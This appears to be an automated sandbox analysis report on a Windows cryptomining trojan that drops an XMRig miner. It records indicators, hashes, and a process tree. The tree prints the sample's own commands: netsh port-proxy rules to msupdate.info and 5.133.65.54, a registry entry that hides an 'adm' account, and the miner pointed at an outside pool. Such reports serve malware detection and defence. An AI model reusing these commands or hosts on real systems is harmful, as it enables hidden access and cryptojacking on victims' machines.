Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
18-05-2022 21:55
Static task
static1
Behavioral task
behavioral1
Sample
298a18db753d40380aa41c3cdde1825c.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
298a18db753d40380aa41c3cdde1825c.exe
Resource
win10v2004-20220414-en
General
-
Target
298a18db753d40380aa41c3cdde1825c.exe
-
Size
397KB
-
MD5
298a18db753d40380aa41c3cdde1825c
-
SHA1
a54eb952b7687bd8ad82c3934e3a3538547fb4a9
-
SHA256
4547b578ed4468731e348a47a16a26beeaf192c616b70d575f3a04328978a981
-
SHA512
3260d9c83dda85aebaf6f46d9c8e6dabaeec0bc03a85f8a1591aebc33c450a5943187282b1a0323eea949bceb00f866aced663c8b3433792173198e15558d4c7
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
$77_oracle.exe$77_oracle.exepid process 1272 $77_oracle.exe 4704 $77_oracle.exe -
Sets file execution options in registry 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
298a18db753d40380aa41c3cdde1825c.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation 298a18db753d40380aa41c3cdde1825c.exe -
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
298a18db753d40380aa41c3cdde1825c.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 298a18db753d40380aa41c3cdde1825c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts 298a18db753d40380aa41c3cdde1825c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" 298a18db753d40380aa41c3cdde1825c.exe -
Modifies powershell logging option 1 TTPs
-
Drops file in Windows directory 2 IoCs
Processes:
298a18db753d40380aa41c3cdde1825c.exedescription ioc process File created C:\Windows\SoftwareDistribution\config.xml 298a18db753d40380aa41c3cdde1825c.exe File opened for modification C:\Windows\SoftwareDistribution\config.xml 298a18db753d40380aa41c3cdde1825c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXEpid process 4628 NETSTAT.EXE 2684 NETSTAT.EXE 1408 NETSTAT.EXE 220 NETSTAT.EXE 4524 NETSTAT.EXE 4276 NETSTAT.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
298a18db753d40380aa41c3cdde1825c.exepid process 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe 2448 298a18db753d40380aa41c3cdde1825c.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 648 648 -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
298a18db753d40380aa41c3cdde1825c.exemsiexec.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exedescription pid process Token: SeDebugPrivilege 2448 298a18db753d40380aa41c3cdde1825c.exe Token: SeSecurityPrivilege 4444 msiexec.exe Token: SeDebugPrivilege 1408 NETSTAT.EXE Token: SeDebugPrivilege 220 NETSTAT.EXE Token: SeDebugPrivilege 4524 NETSTAT.EXE Token: SeLockMemoryPrivilege 1272 $77_oracle.exe Token: SeLockMemoryPrivilege 1272 $77_oracle.exe Token: SeDebugPrivilege 4276 NETSTAT.EXE Token: SeDebugPrivilege 4628 NETSTAT.EXE Token: SeDebugPrivilege 2684 NETSTAT.EXE Token: SeLockMemoryPrivilege 4704 $77_oracle.exe Token: SeLockMemoryPrivilege 4704 $77_oracle.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
$77_oracle.exe$77_oracle.exepid process 1272 $77_oracle.exe 4704 $77_oracle.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
298a18db753d40380aa41c3cdde1825c.execsc.exedescription pid process target process PID 2448 wrote to memory of 3656 2448 298a18db753d40380aa41c3cdde1825c.exe csc.exe PID 2448 wrote to memory of 3656 2448 298a18db753d40380aa41c3cdde1825c.exe csc.exe PID 3656 wrote to memory of 4824 3656 csc.exe cvtres.exe PID 3656 wrote to memory of 4824 3656 csc.exe cvtres.exe PID 2448 wrote to memory of 988 2448 298a18db753d40380aa41c3cdde1825c.exe chcp.com PID 2448 wrote to memory of 988 2448 298a18db753d40380aa41c3cdde1825c.exe chcp.com PID 2448 wrote to memory of 3344 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 3344 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 1408 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 1408 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 220 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 220 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 4524 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 4524 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 5056 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 5056 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 2400 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 2400 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 1632 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 1632 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 3840 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 3840 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 3740 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 3740 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 1272 2448 298a18db753d40380aa41c3cdde1825c.exe $77_oracle.exe PID 2448 wrote to memory of 1272 2448 298a18db753d40380aa41c3cdde1825c.exe $77_oracle.exe PID 2448 wrote to memory of 3084 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 3084 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 4276 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 4276 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 4628 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 4628 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 2684 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 2684 2448 298a18db753d40380aa41c3cdde1825c.exe NETSTAT.EXE PID 2448 wrote to memory of 5092 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 5092 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 3764 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 3764 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 1888 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe PID 2448 wrote to memory of 1888 2448 298a18db753d40380aa41c3cdde1825c.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\298a18db753d40380aa41c3cdde1825c.exe"C:\Users\Admin\AppData\Local\Temp\298a18db753d40380aa41c3cdde1825c.exe"1⤵
- Checks computer location settings
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\db5j3cda.cmdline"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8572.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8571.tmp"3⤵
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 4372⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy reset2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe"C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe" -o 5.133.65.54:80 --http-port 888 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.542⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeC:\Users\Admin\AppData\Local\Temp\$77_oracle.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\RES8572.tmpFilesize
1KB
MD5b8a8c3ed50742ba9e2986506f9786e7a
SHA1c659430083bf8077500bfbbc02911cf13baa1a42
SHA25669242ba264b943c8ee2941e76b1583eccbd8d114e4076510d8044588dcd4cf03
SHA512cdbcc6c5618b1c24083e6b72f8aa83d4a7cc773d305895dff4c36159410b6511a39a7e208d32c3246af49c628d1a14353981de42866a78a5039069ba4ab5571f
-
C:\Users\Admin\AppData\Local\Temp\config.jsonFilesize
3KB
MD574fb175e205d74c162df04f8236ec94b
SHA157ccfe00ef11556ffa576c74eeecf3730659ae89
SHA2561fb2afa760aeaee7a0201e34a6ff5071d5755312d14132e8956e840eaae78dc9
SHA5128b7ab1c082a965b921f3a56a75e2190365e5b7f1519b4d8da9c78cded313ed151ed8967e9b0599077c284ea4127e0471ecdc936dd96ca624d5a9f5707ce54830
-
C:\Users\Admin\AppData\Local\Temp\db5j3cda.dllFilesize
3KB
MD5e576ffe32b6c816cf1e6d419b6330a7a
SHA18d192377f0023a9c92e95f5afe63f7b157cccebf
SHA256cce6fe6cb48dfb4dbd1efd5e974447add4d7214d7814eaccc279172588a11a20
SHA51237c276e26df52dfc524e93326b5b0f2a54e707c1bf0164bce7389ae04c396b6e491f051d162a5fb09bd237ad31f5dfcd2a228080259d0721a53baf242e45b126
-
C:\Users\Admin\AppData\Local\Temp\db5j3cda.pdbFilesize
11KB
MD55c30403a478100bbd7cf042e8b29c537
SHA1da6b6c7fe921ed31f01fc428d95cd0f9acc97b8a
SHA2566f01726fca75a7ec0c44c5c4b83c3c76b44de908b05678a49ed0a6381cbb1f33
SHA5125c3f4ebceaed6e0420f0d2b4d218d58dd88526d0d29c1449f740d18309db091859f0b90bdac2b866724da44c3dbded3b116bfbd613725eb0e3c868bf0f677874
-
\??\c:\Users\Admin\AppData\Local\Temp\CSC8571.tmpFilesize
652B
MD5eb5ce9ec4448dd5958f15780ab1429cc
SHA15bd5d38005e044f3b698753757912216ed06d3a4
SHA25609cadbcd339f5e9153bef7c15493abc862edfbd8e102bb358ffeae9a59ac048d
SHA512b5f6b337cd06cf0abd70879d3975d7b64084875b79157944b32adb0774cb8fe6367bb89e2efa9df6f8ed4ba77125fdaad44aaf31195ae3007e0e9ec91cb87d67
-
\??\c:\Users\Admin\AppData\Local\Temp\db5j3cda.0.csFilesize
447B
MD51640a04633fee0dfdc7e22c4f4063bf6
SHA13cb525c47b5dd37f8ee45b034c9452265fba5476
SHA25655e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
SHA51285c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d
-
\??\c:\Users\Admin\AppData\Local\Temp\db5j3cda.cmdlineFilesize
309B
MD5be263eaa8dd59d466f624a120eb13d30
SHA16bc7e84f6040e427cfdafcf62ca9eaa5bf5fe19f
SHA25634dbd8e662d4719d9d8981b3edae779c30093bad149f79f2a2e6a250b1efd697
SHA512a49a4f2aa8e03aae00705b006162a4b48a85bb565551f4189eeba8507d5f0c608acb848096e6df6930954bf535e02eb1eab376fc9c11b42800d2a700ce9e8007
-
memory/220-142-0x0000000000000000-mapping.dmp
-
memory/988-139-0x0000000000000000-mapping.dmp
-
memory/1272-153-0x0000020286020000-0x0000020286060000-memory.dmpFilesize
256KB
-
memory/1272-149-0x0000000000000000-mapping.dmp
-
memory/1272-152-0x0000020284730000-0x0000020284750000-memory.dmpFilesize
128KB
-
memory/1408-141-0x0000000000000000-mapping.dmp
-
memory/1632-146-0x0000000000000000-mapping.dmp
-
memory/1888-160-0x0000000000000000-mapping.dmp
-
memory/2400-145-0x0000000000000000-mapping.dmp
-
memory/2448-130-0x00007FFE51460000-0x00007FFE51FBD000-memory.dmpFilesize
11.4MB
-
memory/2448-166-0x00000000015AA000-0x00000000015AF000-memory.dmpFilesize
20KB
-
memory/2684-157-0x0000000000000000-mapping.dmp
-
memory/3084-154-0x0000000000000000-mapping.dmp
-
memory/3344-140-0x0000000000000000-mapping.dmp
-
memory/3656-131-0x0000000000000000-mapping.dmp
-
memory/3740-148-0x0000000000000000-mapping.dmp
-
memory/3764-159-0x0000000000000000-mapping.dmp
-
memory/3840-147-0x0000000000000000-mapping.dmp
-
memory/4276-155-0x0000000000000000-mapping.dmp
-
memory/4524-143-0x0000000000000000-mapping.dmp
-
memory/4628-156-0x0000000000000000-mapping.dmp
-
memory/4704-164-0x00000213830A0000-0x00000213830C0000-memory.dmpFilesize
128KB
-
memory/4704-165-0x00000213830C0000-0x00000213830E0000-memory.dmpFilesize
128KB
-
memory/4824-134-0x0000000000000000-mapping.dmp
-
memory/5056-144-0x0000000000000000-mapping.dmp
-
memory/5092-158-0x0000000000000000-mapping.dmp